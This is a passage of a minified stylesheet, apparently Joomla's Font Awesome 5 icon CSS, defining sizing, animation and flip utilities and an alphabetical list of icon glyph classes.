 */.fa,.fab,.fad,.fal,.far,.fas,.icon-joomla,[class*=" icon-"],[class^=icon-]{text-rendering:auto}.fa,.fab,.fad,.fal,.far,.fas,.icon-joomla,[class*=" icon-"],[class^=icon-]{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;line-height:1}.icon-joomla,[class*=" icon-"],[class^=icon-]{font-weight:400}.fa-lg,.icon-lg{font-size:1.3333333333em;line-height:.75em;vertical-align:-.0667em}.fa-xs,.icon-xs{font-size:.75em}.fa-sm,.icon-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw,.icon-fw{text-align:center;width:1.25em}.fa-ul,.icon-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li,.icon-ul>li{position:relative}.fa-li,.icon-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border,.icon-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left,.icon-pull-left{float:left}.fa-pull-right,.icon-pull-right{float:right}.fa-pull-left.icon-joomla,.fa-pull-left[class*=" icon-"],.fa-pull-left[class^=icon-],.fa.fa-pull-left,.fa.icon-pull-left,.fab.fa-pull-left,.fab.icon-pull-left,.fal.fa-pull-left,.fal.icon-pull-left,.far.fa-pull-left,.far.icon-pull-left,.fas.fa-pull-left,.fas.icon-pull-left,.icon-joomla.icon-pull-left,[class*=" icon-"].icon-pull-left,[class^=icon-].icon-pull-left{margin-right:.3em}.fa-pull-right.icon-joomla,.fa-pull-right[class*=" icon-"],.fa-pull-right[class^=icon-],.fa.fa-pull-right,.fa.icon-pull-right,.fab.fa-pull-right,.fab.icon-pull-right,.fal.fa-pull-right,.fal.icon-pull-right,.far.fa-pull-right,.far.icon-pull-right,.fas.fa-pull-right,.fas.icon-pull-right,.icon-joomla.icon-pull-right,[class*=" icon-"].icon-pull-right,[class^=icon-].icon-pull-right{margin-left:.3em}.fa-spin,.icon-spin{-webkit-animation:fa-spin 2s linear infinite;animation:fa-spin 2s linear infinite}.fa-pulse,.icon-pulse{-webkit-animation:fa-spin 1s steps(8) infinite;animation:fa-spin 1s steps(8) infinite}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}.fa-rotate-90,.icon-rotate-90{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";-webkit-transform:rotate(90deg);transform:rotate(90deg)}.fa-rotate-180,.icon-rotate-180{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";-webkit-transform:rotate(180deg);transform:rotate(180deg)}.fa-rotate-270,.icon-rotate-270{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";-webkit-transform:rotate(270deg);transform:rotate(270deg)}.fa-flip-horizontal,.icon-flip-horizontal{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";-webkit-transform:scaleX(-1);transform:scaleX(-1)}.fa-flip-vertical,.icon-flip-vertical{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";-webkit-transform:scaleY(-1);transform:scaleY(-1)}.fa-flip-both,.fa-flip-horizontal.fa-flip-vertical,.fa-flip-horizontal.icon-flip-vertical,.fa-flip-vertical.icon-flip-horizontal,.icon-flip-both,.icon-flip-horizontal.icon-flip-vertical{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";-webkit-transform:scale(-1);transform:scale(-1)}:root .fa-flip-both,:root .fa-flip-horizontal,:root .fa-flip-vertical,:root .fa-rotate-90,:root .fa-rotate-180,:root .fa-rotate-270,:root .icon-flip-both,:root .icon-flip-horizontal,:root .icon-flip-vertical,:root .icon-rotate-90,:root .icon-rotate-180,:root .icon-rotate-270{-webkit-filter:none;filter:none}.fa-stack,.icon-stack{display:inline-block;height:2em;line-height:2em;position:relative;vertical-align:middle;width:2.5em}.fa-stack-1x,.fa-stack-2x,.icon-stack-1x,.icon-stack-2x{left:0;position:absolute;text-align:center;width:100%}.fa-stack-1x,.icon-stack-1x{line-height:inherit}.fa-stack-2x,.icon-stack-2x{font-size:2em}.fa-inverse,.icon-inverse{color:#fff}.fa-500px:before{content:""}.fa-accessible-icon:before{content:""}.fa-accusoft:before{content:""}.fa-acquisitions-incorporated:before{content:""}.fa-ad:before{content:""}.fa-address-book:before{content:""}.fa-address-card:before{content:""}.fa-adjust:before{content:""}.fa-adn:before{content:""}.fa-adversal:before{content:""}.fa-affiliatetheme:before{content:""}.fa-air-freshener:before{content:""}.fa-airbnb:before{content:""}.fa-algolia:before{content:""}.fa-align-center:before{content:""}.fa-align-justify:before{content:""}.fa-align-left:before{content:""}.fa-align-right:before{content:""}.fa-alipay:before{content:""}.fa-allergies:before{content:""}.fa-amazon:before{content:""}.fa-amazon-pay:before{content:""}.fa-ambulance:before{content:""}.fa-american-sign-language-interpreting:before{content:""}.fa-amilia:before{content:""}.fa-anchor:before{content:""}.fa-android:before{content:""}.fa-angellist:before{content:""}.fa-angle-double-down:before{content:""}.fa-angle-double-left:before{content:""}.fa-angle-double-right:before{content:""}.fa-angle-double-up:before{content:""}.fa-angle-down:before{content:""}.fa-angle-left:before{content:""}.fa-angle-right:before{content:""}.fa-angle-up:before{content:""}.fa-angry:before{content:""}.fa-angrycreative:before{content:""}.fa-angular:before{content:""}.fa-ankh:before{content:""}.fa-app-store:before{content:""}.fa-app-store-ios:before{content:""}.fa-apper:before{content:""}.fa-apple:before{content:""}.fa-apple-alt:before{content:""}.fa-apple-pay:before{content:""}.fa-archive:before{content:""}.fa-archway:before{content:""}.fa-arrow-alt-circle-down:before{content:""}.fa-arrow-alt-circle-left:before{content:""}.fa-arrow-alt-circle-right:before{content:""}.fa-arrow-alt-circle-up:before{content:""}.fa-arrow-circle-down:before{content:""}.fa-arrow-circle-left:before{content:""}.fa-arrow-circle-right:before{content:""}.fa-arrow-circle-up:before{content:""}.fa-arrow-down:before{content:""}.fa-arrow-left:before{content:""}.fa-arrow-right:before{content:""}.fa-arrow-up:before{content:""}.fa-arrows-alt:before{content:""}.fa-arrows-alt-h:before{content:""}.fa-arrows-alt-v:before{content:""}.fa-artstation:before{content:""}.fa-assistive-listening-systems:before{content:""}.fa-asterisk:before{content:""}.fa-asymmetrik:before{content:""}.fa-at:before{content:""}.fa-atlas:before{content:""}.fa-atlassian:before{content:""}.fa-atom:before{content:""}.fa-audible:before{content:""}.fa-audio-description:before{content:""}.fa-autoprefixer:before{content:""}.fa-avianex:before{content:""}.fa-aviato:before{content:""}.fa-award:before{content:""}.fa-aws:before{content:""}.fa-baby:before{content:""}.fa-baby-carriage:before{content:""}.fa-backspace:before{content:""}.fa-backward:before{content:""}.fa-bacon:before{content:""}.fa-bacteria:before{content:""}.fa-bacterium:before{content:""}.fa-bahai:before{content:""}.fa-balance-scale:before{content:""}.fa-balance-scale-left:before{content:""}.fa-balance-scale-right:before{content:""}.fa-ban:before{content:""}.fa-band-aid:before{content:""}.fa-bandcamp:before{content:""}.fa-barcode:before{content:""}.fa-bars:before{content:""}.fa-baseball-ball:before{content:""}.fa-basketball-ball:before{content:""}.fa-bath:before{content:""}.fa-battery-empty:before{content:""}.fa-battery-full:before{content:""}.fa-battery-half:before{content:""}.fa-battery-quarter:before{content:""}.fa-battery-three-quarters:before{content:""}.fa-battle-net:before{content:""}.fa-bed:before{content:""}.fa-beer:before{content:""}.fa-behance:before{content:""}.fa-behance-square:before{content:""}.fa-bell:before{content:""}.fa-bell-slash:before{content:""}.fa-bezier-curve:before{content:""}.fa-bible:before{content:""}.fa-bicycle:before{content:""}.fa-biking:before{content:""}.fa-bimobject:before{content:""}.fa-binoculars:before{content:""}.fa-biohazard:before{content:""}.fa-birthday-cake:before{content:""}.fa-bitbucket:before{content:""}.fa-bitcoin:before{content:""}.fa-bity:before{content:""}.fa-black-tie:before{content:""}.fa-blackberry:before{content:""}.fa-blender:before{content:""}.fa-blender-phone:before{content:""}.fa-blind:before{content:""}.fa-blog:before{content:""}.fa-blogger:before{content:""}.fa-blogger-b:before{content:""}.fa-bluetooth:before{content:""}.fa-bluetooth-b:before{content:""}.fa-bold:before{content:""}.fa-bolt:before{content:""}.fa-bomb:before{content:""}.fa-bone:before{content:""}.fa-bong:before{content:""}.fa-book:before{content:""}.fa-book-dead:before{content:""}.fa-book-medical:before{content:""}.fa-book-open:before{content:""}.fa-book-reader:before{content:""}.fa-bookmark:before{content:""}.fa-bootstrap:before{content:""}.fa-border-all:before{content:""}.fa-border-none:before{content:""}.fa-border-style:before{content:""}.fa-bowling-ball:before{content:""}.fa-box:before{content:""}.fa-box-open:before{content:""}.fa-box-tissue:before{content:""}.fa-boxes:before{content:""}.fa-braille:before{content:""}.fa-brain:before{content:""}.fa-bread-slice:before{content:""}.fa-briefcase:before{content:""}.fa-briefcase-medical:before{content:""}.fa-broadcast-tower:before{content:""}.fa-broom:before{content:""}.fa-brush:before{content:""}.fa-btc:before{content:""}.fa-buffer:before{content:""}.fa-bug:before{content:""}.fa-building:before{content:""}.fa-bullhorn:before{content:""}.fa-bullseye:before{content:""}.fa-burn:before{content:""}.fa-buromobelexperte:before{content:""}.fa-bus:before{content:""}.fa-bus-alt:before{content:""}.fa-business-time:before{content:""}.fa-buy-n-large:before{content:""}.fa-buysellads:before{content:""}.fa-calculator:before{content:""}.fa-calendar:before{content:""}.fa-calendar-alt:before{content:""}.fa-calendar-check:before{content:""}.fa-calendar-day:before{content:""}.fa-calendar-minus:before{content:""}.fa-calendar-plus:before{content:""}.fa-calendar-times:before{content:""}.fa-calendar-week:before{content:""}.fa-camera:before{content:""}.fa-camera-retro:before{content:""}.fa-campground:before{content:""}.fa-canadian-maple-leaf:before{content:""}.fa-candy-cane:before{content:""}.fa-cannabis:before{content:""}.fa-capsules:before{content:""}.fa-car:before{content:""}.fa-car-alt:before{content:""}.fa-car-battery:before{content:""}.fa-car-crash:before{content:""}.fa-car-side:before{content:""}.fa-caravan:before{content:""}.fa-caret-down:before{content:""}.fa-caret-left:before{content:""}.fa-caret-right:before{content:""}.fa-caret-square-down:before{content:""}.fa-caret-square-left:before{content:""}.fa-caret-square-right:before{content:""}.fa-caret-square-up:before{content:""}.fa-caret-up:before{content:""}.fa-carrot:before{content:""}.fa-cart-arrow-down:before{content:""}.fa-cart-plus:before{content:""}.fa-cash-register:before{content:""}.fa-cat:before{content:""}.fa-cc-amazon-pay:before{content:""}.fa-cc-amex:before{content:""}.fa-cc-apple-pay:before{content:""}.fa-cc-diners-club:before{content:""}.fa-cc-discover:before{content:""}.fa-cc-jcb:before{content:""}.fa-cc-mastercard:before{content:""}.fa-cc-paypal:before{content:""}.fa-cc-stripe:before{content:""}.fa-cc-visa:before{content:""}.fa-centercode:before{content:""}.fa-centos:before{content:""}.fa-certificate:before{content:""}.fa-chair:before{content:""}.fa-chalkboard:before{content:""}.fa-chalkboard-teacher:before{content:""}.fa-charging-station:before{content:""}.fa-chart-area:before{content:""}.fa-chart-bar:before{content:""}.fa-chart-line:before{content:""}.fa-chart-pie:before{content:""}.fa-check:before{content:""}.fa-check-circle:before{content:""}.fa-check-double:before{content:""}.fa-check-square:before{content:""}.fa-cheese:before{content:""}.fa-chess:before{content:""}.fa-chess-bishop:before{content:""}.fa-chess-board:before{content:""}.fa-chess-king:before{content:""}.fa-chess-knight:before{content:""}.fa-chess-pawn:before{content:""}.fa-chess-queen:before{content:""}.fa-chess-rook:before{content:""}.fa-chevron-circle-down:before{content:""}.fa-chevron-circle-left:before{content:""}.fa-chevron-circle-right:before{content:""}.fa-chevron-circle-up:before{content:""}.fa-chevron-down:before{content:""}.fa-chevron-left:before{content:""}.fa-chevron-right:before{content:""}.fa-chevron-up:before{content:""}.fa-child:before{content:""}.fa-chrome:before{content:""}.fa-chromecast:before{content:""}.fa-church:before{content:""}.fa-circle:before{content:""}.fa-circle-notch:before{content:""}.fa-city:before{content:""}.fa-clinic-medical:before{content:""}.fa-clipboard:before{content:""}.fa-clipboard-check:before{content:""}.fa-clipboard-list:before{content:""}.fa-clock:before{content:""}.fa-clone:before{content:""}.fa-closed-captioning:before{content:""}.fa-cloud:before{content:""}.fa-cloud-download-alt:before{content:""}.fa-cloud-meatball:before{content:""}.fa-cloud-moon:before{content:""}.fa-cloud-moon-rain:before{content:""}.fa-cloud-rain:before{content:""}.fa-cloud-showers-heavy:before{content:""}.fa-cloud-sun:before{content:""}.fa-cloud-sun-rain:before{content:""}.fa-cloud-upload-alt:before{content:""}.fa-cloudflare:before{content:""}.fa-cloudscale:before{content:""}.fa-cloudsmith:before{content:""}.fa-cloudversify:before{content:""}.fa-cocktail:before{content:""}.fa-code:before{content:""}.fa-code-branch:before{content:""}.fa-codepen:before{content:""}.fa-codiepie:before{content:""}.fa-coffee:before{content:""}.fa-cog:before{content:""}.fa-cogs:before{content:""}.fa-coins:before{content:""}.fa-columns:before{content:""}.fa-comment:before{content:""}.fa-comment-alt:before{content:""}.fa-comment-dollar:before{content:""}.fa-comment-dots:before{content:""}.fa-comment-medical:before{content:""}.fa-comment-slash:before{content:""}.fa-comments:before{content:""}.fa-comments-dollar:before{content:""}.fa-compact-disc:before{content:""}.fa-compass:before{content:""}.fa-compress:before{content:""}.fa-compress-alt:before{content:""}.fa-compress-arrows-alt:before{content:""}.fa-concierge-bell:before{content:""}.fa-confluence:before{content:""}.fa-connectdevelop:before{content:""}.fa-contao:before{content:""}.fa-cookie:before{content:""}.fa-cookie-bite:before{content:""}.fa-copy:before{content:""}.fa-copyright:before{content:""}.fa-cotton-bureau:before{content:""}.fa-couch:before{content:""}.fa-cpanel:before{content:""}.fa-creative-commons:before{content:""}.fa-creative-commons-by:before{content:""}.fa-creative-commons-nc:before{content:""}.fa-creative-commons-nc-eu:before{content:""}.fa-creative-commons-nc-jp:before{content:""}.fa-creative-commons-nd:before{content:""}.fa-creative-commons-pd:before{content:""}.fa-creative-commons-pd-alt:before{content:""}.fa-creative-commons-remix:before{content:""}.fa-creative-commons-sa:before{content:""}.fa-creative-commons-sampling:before{content:""}.fa-creative-commons-sampling-plus:before{content:""}.fa-creative-commons-share:before{content:""}.fa-creative-commons-zero:before{content:""}.fa-credit-card:before{content:""}.fa-critical-role:before{content:""}.fa-crop:before{content:""}.fa-crop-alt:before{content:""}.fa-cross:before{content:""}.fa-crosshairs:before{content:""}.fa-crow:before{content:""}.fa-crown:before{content:""}.fa-crutch:before{content:""}.fa-css3:before{content:""}.fa-css3-alt:before{content:""}.fa-cube:before{content:""}.fa-cubes:before{content:""}.fa-cut:before{content:""}.fa-cuttlefish:before{content:""}.fa-d-and-d:before{content:""}.fa-d-and-d-beyond:before{content:""}.fa-dailymotion:before{content:""}.fa-dashcube:before{content:""}.fa-database:before{content:""}.fa-deaf:before{content:""}.fa-deezer:before{content:""}.fa-delicious:before{content:""}.fa-democrat:before{content:""}.fa-deploydog:before{content:""}.fa-deskpro:before{content:""}.fa-desktop:before{content:""}.fa-dev:before{content:""}.fa-deviantart:before{content:""}.fa-dharmachakra:before{content:""}.fa-dhl:before{content:""}.fa-diagnoses:before{content:""}.fa-diaspora:before{content:""}.fa-dice:before{content:""}.fa-dice-d20:before{content:""}.fa-dice-d6:before{content:""}.fa-dice-five:before{content:""}.fa-dice-four:before{content:""}.fa-dice-one:before{content:""}.fa-dice-six:before{content:""}.fa-dice-three:before{content:""}.fa-dice-two:before{content:""}.fa-digg:before{content:""}.fa-digital-ocean:before{content:""}.fa-digital-tachograph:before{content:""}.fa-directions:before{content:""}.fa-discord:before{content:""}.fa-discourse:before{content:""}.fa-disease:before{content:""}.fa-divide:before{content:""}.fa-dizzy:before{content:""}.fa-dna:before{content:""}.fa-dochub:before{content:""}.fa-docker:before{content:""}.fa-dog:before{content:""}.fa-dollar-sign:before{content:""}.fa-dolly:before{content:""}.fa-dolly-flatbed:before{content:""}.fa-donate:before{content:""}.fa-door-closed:before{content:""}.fa-door-open:before{content:""}.fa-dot-circle:before{content:""}.fa-dove:before{content:""}.fa-download:before{content:""}.fa-draft2digital:before{content:""}.fa-drafting-compass:before{content:""}.fa-dragon:before{content:""}.fa-draw-polygon:before{content:""}.fa-dribbble:before{content:""}.fa-dribbble-square:before{content:""}.fa-dropbox:before{content:""}.fa-drum:before{content:""}.fa-drum-steelpan:before{content:""}.fa-drumstick-bite:before{content:""}.fa-drupal:before{content:""}.fa-dumbbell:before{content:""}.fa-dumpster:before{content:""}.fa-dumpster-fire:before{content:""}.fa-dungeon:before{content:""}.fa-dyalog:before{content:""}.fa-earlybirds:before{content:""}.fa-ebay:before{content:""}.fa-edge:before{content:""}.fa-edge-legacy:before{content:""}.fa-edit:before{content:""}.fa-egg:before{content:""}.fa-eject:before{content:""}.fa-elementor:before{content:""}.fa-ellipsis-h:before{content:""}.fa-ellipsis-v:before{content:""}.fa-ello:before{content:""}.fa-ember:before{content:""}.fa-empire:before{content:""}.fa-envelope:before{content:""}.fa-envelope-open:before{content:""}.fa-envelope-open-text:before{content:""}.fa-envelope-square:before{content:""}.fa-envira:before{content:""}.fa-equals:before{content:""}.fa-eraser:before{content:""}.fa-erlang:before{content:""}.fa-ethereum:before{content:""}.fa-ethernet:before{content:""}.fa-etsy:before{content:""}.fa-euro-sign:before{content:""}.fa-evernote:before{content:""}.fa-exchange-alt:before{content:""}.fa-exclamation:before{content:""}.fa-exclamation-circle:before{content:""}.fa-exclamation-triangle:before{content:""}.fa-expand:before{content:""}.fa-expand-alt:before{content:""}.fa-expand-arrows-alt:before{content:""}.fa-expeditedssl:before{content:""}.fa-external-link-alt:before{content:""}.fa-external-link-square-alt:before{content:""}.fa-eye:before{content:""}.fa-eye-dropper:before{content:""}.fa-eye-slash:before{content:""}.fa-facebook:before{content:""}.fa-facebook-f:before{content:""}.fa-facebook-messenger:before{content:""}.fa-facebook-square:before{content:""}.fa-fan:before{content:""}.fa-fantasy-flight-games:before{content:""}.fa-fast-backward:before{content:""}.fa-fast-forward:before{content:""}.fa-faucet:before{content:""}.fa-fax:before{content:""}.fa-feather:before{content:""}.fa-feather-alt:before{content:""}.fa-fedex:before{content:""}.fa-fedora:before{content:""}.fa-female:before{content:""}.fa-fighter-jet:before{content:""}.fa-figma:before{content:""}.fa-file:before{content:""}.fa-file-alt:before{content:""}.fa-file-archive:before{content:""}.fa-file-audio:before{content:""}.fa-file-code:before{content:""}.fa-file-contract:before{content:""}.fa-file-csv:before{content:""}.fa-file-download:before{content:""}.fa-file-excel:before{content:""}.fa-file-export:before{content:""}.fa-file-image:before{content:""}.fa-file-import:before{content:""}.fa-file-invoice:before{content:""}.fa-file-invoice-dollar:before{content:""}.fa-file-medical:before{content:""}.fa-file-medical-alt:before{content:""}.fa-file-pdf:before{content:""}.fa-file-powerpoint:before{content:""}.fa-file-prescription:before{content:""}.fa-file-signature:before{content:""}.fa-file-upload:before{content:""}.fa-file-video:before{content:""}.fa-file-word:before{content:""}.fa-fill:before{content:""}.fa-fill-drip:before{content:""}.fa-film:before{content:""}.fa-filter:before{content:""}.fa-fingerprint:before{content:""}.fa-fire:before{content:""}.fa-fire-alt:before{content:""}.fa-fire-extinguisher:before{content:""}.fa-firefox:before{content:""}.fa-firefox-browser:before{content:""}.fa-first-aid:before{content:""}.fa-first-order:before{content:""}.fa-first-order-alt:before{content:""}.fa-firstdraft:before{content:""}.fa-fish:before{content:""}.fa-fist-raised:before{content:""}.fa-flag:before{content:""}.fa-flag-checkered:before{content:""}.fa-flag-usa:before{content:""}.fa-flask:before{content:""}.fa-flickr:before{content:""}.fa-flipboard:before{content:""}.fa-flushed:before{content:""}.fa-fly:before{content:""}.fa-folder:before{content:""}.fa-folder-minus:before{content:""}.fa-folder-open:before{content:""}.fa-folder-plus:before{content:""}.fa-font:before{content:""}.fa-font-awesome:before{content:""}.fa-font-awesome-alt:before{content:""}.fa-font-awesome-flag:before{content:""}.fa-font-awesome-logo-full:before{content:""}.fa-fonticons:before{content:""}.fa-fonticons-fi:before{content:""}.fa-football-ball:before{content:""}.fa-fort-awesome:before{content:""}.fa-fort-awesome-alt:before{content:""}.fa-forumbee:before{content:""}.fa-forward:before{content:""}.fa-foursquare:before{content:""}.fa-free-code-camp:before{content:""}.fa-freebsd:before{content:""}.fa-frog:before{content:""}.fa-frown:before{content:""}.fa-frown-open:before{content:""}.fa-fulcrum:before{content:""}.fa-funnel-dollar:before{content:""}.fa-futbol:before{content:""}.fa-galactic-republic:before{content:""}.fa-galactic-senate:before{content:""}.fa-gamepad:before{content:""}.fa-gas-pump:before{content:""}.fa-gavel:before{content:""}.fa-gem:before{content:""}.fa-genderless:before{content:""}.fa-get-pocket:before{content:""}.fa-gg:before{content:""}.fa-gg-circle:before{content:""}.fa-ghost:before{content:""}.fa-gift:before{content:""}.fa-gifts:before{content:""}.fa-git:before{content:""}.fa-git-alt:before{content:""}.fa-git-square:before{content:""}.fa-github:before{content:""}.fa-github-alt:before{content:""}.fa-github-square:before{content:""}.fa-gitkraken:before{content:""}.fa-gitlab:before{content:""}.fa-gitter:before{content:""}.fa-glass-cheers:before{content:""}.fa-glass-martini:before{content:""}.fa-glass-martini-alt:before{content:""}.fa-glass-whiskey:before{content:""}.fa-glasses:before{content:""}.fa-glide:before{content:""}.fa-glide-g:before{content:""}.fa-globe:before{content:""}.fa-globe-africa:before{content:""}.fa-globe-americas:before{content:""}.fa-globe-asia:before{content:""}.fa-globe-europe:before{content:""}.fa-gofore:before{content:""}.fa-golf-ball:before{content:""}.fa-goodreads:before{content:""}.fa-goodreads-g:before{content:""}.fa-google:before{content:""}.fa-google-drive:before{content:""}.fa-google-pay:before{content:""}.fa-google-play:before{content:""}.fa-google-plus:before{content:""}.fa-google-plus-g:before{content:""}.fa-google-plus-square:before{content:""}.fa-google-wallet:before{content:""}.fa-gopuram:before{content:""}.fa-graduation-cap:before{content:""}.fa-gratipay:before{content:""}.fa-grav:before{content:""}.fa-greater-than:before{content:""}.fa-greater-than-equal:before{content:""}.fa-grimace:before{content:""}.fa-grin:before{content:""}.fa-grin-alt:before{content:""}.fa-grin-beam:before{content:""}.fa-grin-beam-sweat:before{content:""}.fa-grin-hearts:before{content:""}.fa-grin-squint:before{content:""}.fa-grin-squint-tears:before{content:""}.fa-grin-stars:before{content:""}.fa-grin-tears:before{content:""}.fa-grin-tongue:before{content:""}.fa-grin-tongue-squint:before{content:""}.fa-grin-tongue-wink:before{content:""}.fa-grin-wink:before{content:""}.fa-grip-horizontal:before{content:""}.fa-grip-lines:before{content:""}.fa-grip-lines-vertical:before{content:""}.fa-grip-vertical:before{content:""}.fa-gripfire:before{content:""}.fa-grunt:before{content:""}.fa-guilded:before{content:""}.fa-guitar:before{content:""}.fa-gulp:before{content:""}.fa-h-square:before{content:""}.fa-hacker-news:before{content:""}.fa-hacker-news-square:before{content:""}.fa-hackerrank:before{content:""}.fa-hamburger:before{content:""}.fa-hammer:before{content:""}.fa-hamsa:before{content:""}.fa-hand-holding:before{content:""}.fa-hand-holding-heart:before{content:""}.fa-hand-holding-medical:before{content:""}.fa-hand-holding-usd:before{content:""}.fa-hand-holding-water:before{content:""}.fa-hand-lizard:before{content:""}.fa-hand-middle-finger:before{content:""}.fa-hand-paper:before{content:""}.fa-hand-peace:before{content:""}.fa-hand-point-down:before{content:""}.fa-hand-point-left:before{content:""}.fa-hand-point-right:before{content:""}.fa-hand-point-up:before{content:""}.fa-hand-pointer:before{content:""}.fa-hand-rock:before{content:""}.fa-hand-scissors:before{content:""}.fa-hand-sparkles:before{content:""}.fa-hand-spock:before{content:""}.fa-hands:before{content:""}.fa-hands-helping:before{content:""}.fa-hands-wash:before{content:""}.fa-handshake:before{content:""}.fa-handshake-alt-slash:before{content:""}.fa-handshake-slash:before{content:""}.fa-hanukiah:before{content:""}.fa-hard-hat:before{content:""}.fa-hashtag:before{content:""}.fa-hat-cowboy:before{content:""}.fa-hat-cowboy-side:before{content:""}.fa-hat-wizard:before{content:""}.fa-hdd:before{content:""}.fa-head-side-cough:before{content:""}.fa-head-side-cough-slash:before{content:""}.fa-head-side-mask:before{content:""}.fa-head-side-virus:before{content:""}.fa-heading:before{content:""}.fa-headphones:before{content:""}.fa-headphones-alt:before{content:""}.fa-headset:before{content:""}.fa-heart:before{content:""}.fa-heart-broken:before{content:""}.fa-heartbeat:before{content:""}.fa-helicopter:before{content:""}.fa-highlighter:before{content:""}.fa-hiking:before{content:""}.fa-hippo:before{content:""}.fa-hips:before{content:""}.fa-hire-a-helper:before{content:""}.fa-history:before{content:""}.fa-hive:before{content:""}.fa-hockey-puck:before{content:""}.fa-holly-berry:before{content:""}.fa-home:before{content:""}.fa-hooli:before{content:""}.fa-hornbill:before{content:""}.fa-horse:before{content:""}.fa-horse-head:before{content:""}.fa-hospital:before{content:""}.fa-hospital-alt:before{content:""}.fa-hospital-symbol:before{content:""}.fa-hospital-user:before{content:""}.fa-hot-tub:before{content:""}.fa-hotdog:before{content:""}.fa-hotel:before{content:""}.fa-hotjar:before{content:""}.fa-hourglass:before{content:""}.fa-hourglass-end:before{content:""}.fa-hourglass-half:before{content:""}.fa-hourglass-start:before{content:""}.fa-house-damage:before{content:""}.fa-house-user:before{content:""}.fa-houzz:before{content:""}.fa-hryvnia:before{content:""}.fa-html5:before{content:""}.fa-hubspot:before{content:""}.fa-i-cursor:before{content:""}.fa-ice-cream:before{content:""}.fa-icicles:before{content:""}.fa-icons:before{content:""}.fa-id-badge:before{content:""}.fa-id-card:before{content:""}.fa-id-card-alt:before{content:""}.fa-ideal:before{content:""}.fa-igloo:before{content:""}.fa-image:before{content:""}.fa-images:before{content:""}.fa-imdb:before{content:""}.fa-inbox:before{content:""}.fa-indent:before{content:""}.fa-industry:before{content:""}.fa-infinity:before{content:""}.fa-info:before{content:""}.fa-info-circle:before{content:""}.fa-innosoft:before{content:""}.fa-instagram:before{content:""}.fa-instagram-square:before{content:""}.fa-instalod:before{content:""}.fa-intercom:before{content:""}.fa-internet-explorer:before{content:""}.fa-invision:before{content:""}.fa-ioxhost:before{content:""}.fa-italic:before{content:""}.fa-itch-io:before{content:""}.fa-itunes:before{content:""}.fa-itunes-note:before{content:""}.fa-java:before{content:""}.fa-jedi:before{content:""}.fa-jedi-order:before{content:""}.fa-jenkins:before{content:""}.fa-jira:before{content:""}.fa-joget:before{content:""}.fa-joint:before{content:""}.fa-joomla:before{content:""}.fa-journal-whills:before{content:""}.fa-js:before{content:""}.fa-js-square:before{content:""}.fa-jsfiddle:before{content:""}.fa-kaaba:before{content:""}.fa-kaggle:before{content:""}.fa-key:before{content:""}.fa-keybase:before{content:""}.fa-keyboard:before{content:""}.fa-keycdn:before{content:""}.fa-khanda:before{content:""}.fa-kickstarter:before{content:""}.fa-kickstarter-k:before{content:""}.fa-kiss:before{content:""}.fa-kiss-beam:before{content:""}.fa-kiss-wink-heart:before{content:""}.fa-kiwi-bird:before{content:""}.fa-korvue:before{content:""}.fa-landmark:before{content:""}.fa-language:before{content:""}.fa-laptop:before{content:""}.fa-laptop-code:before{content:""}.fa-laptop-house:before{content:""}.fa-laptop-medical:before{content:""}.fa-laravel:before{content:""}.fa-lastfm:before{content:""}.fa-lastfm-square:before{content:""}.fa-laugh:before{content:""}.fa-laugh-beam:before{content:""}.fa-laugh-squint:before{content:""}.fa-laugh-wink:before{content:""}.fa-layer-group:before{content:""}.fa-leaf:before{content:""}.fa-leanpub:before{content:""}.fa-lemon:before{content:""}.fa-less:before{content:""}.fa-less-than:before{content:""}.fa-less-than-equal:before{content:""}.fa-level-down-alt:before{content:""}.fa-level-up-alt:before{content:""}.fa-life-ring:before{content:""}.fa-lightbulb:before{content:""}.fa-line:before{content:""}.fa-link:before{content:""}.fa-linkedin:before{content:""}.fa-linkedin-in:before{content:""}.fa-linode:before{content:""}.fa-linux:before{content:""}.fa-lira-sign:before{content:""}.fa-list:before{content:""}.fa-list-alt:before{content:""}.fa-list-ol:before{content:""}.fa-list-ul:before{content:""}.fa-location-arrow:before{content:""}.fa-lock:before{content:""}.fa-lock-open:before{content:""}.fa-long-arrow-alt-down:before{content:""}.fa-long-arrow-alt-left:before{content:""}.fa-long-arrow-alt-right:before{content:""}.fa-long-arrow-alt-up:before{content:""}.fa-low-vision:before{content:""}.fa-luggage-cart:before{content:""}.fa-lungs:before{content:""}.fa-lungs-virus:before{content:""}.fa-lyft:before{content:""}.fa-magento:before{content:""}.fa-magic:before{content:""}.fa-magnet:before{content:""}.fa-mail-bulk:before{content:""}.fa-mailchimp:before{content:""}.fa-male:before{content:""}.fa-mandalorian:before{content:""}.fa-map:before{content:""}.fa-map-marked:before{content:""}.fa-map-marked-alt:before{content:""}.fa-map-marker:before{content:""}.fa-map-marker-alt:before{content:""}.fa-map-pin:before{content:""}.fa-map-signs:before{content:""}.fa-markdown:before{content:""}.fa-marker:before{content:""}.fa-mars:before{content:""}.fa-mars-double:before{content:""}.fa-mars-stroke:before{content:""}.fa-mars-stroke-h:before{content:""}.fa-mars-stroke-v:before{content:""}.fa-mask:before{content:""}.fa-mastodon:before{content:""}.fa-maxcdn:before{content:""}.fa-mdb:before{content:""}.fa-medal:before{content:""}.fa-medapps:before{content:""}.fa-medium:before{content:""}.fa-medium-m:before{content:""}.fa-medkit:before{content:""}.fa-medrt:before{content:""}.fa-meetup:be